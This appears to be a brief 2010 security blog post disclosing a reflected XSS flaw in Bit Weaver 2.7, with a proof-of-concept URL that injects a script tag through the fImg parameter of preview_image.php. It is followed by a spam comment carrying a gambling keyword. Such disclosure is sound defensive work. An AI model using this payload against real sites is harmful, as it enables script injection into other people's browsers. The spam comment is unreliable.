This site is soon to be deprecated by http://www.johnleitch.net

Monday, July 5, 2010

Bit Weaver 2.7 Reflected XSS

An XSS vulnerability in Bit Weaver 2.7 can be exploited to
execute arbitrary JavaScript.

PoC
http://localhost/bitweaver/themes/preview_image.php?fImg=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

1 comment:

  1. Wonderful blog! I found it while searching on Yahoo News. Do you have any tips on how to get listed in Yahoo News? I’ve been trying for a while but I never sbobet
    seem to get there! Many thanks.

    ReplyDelete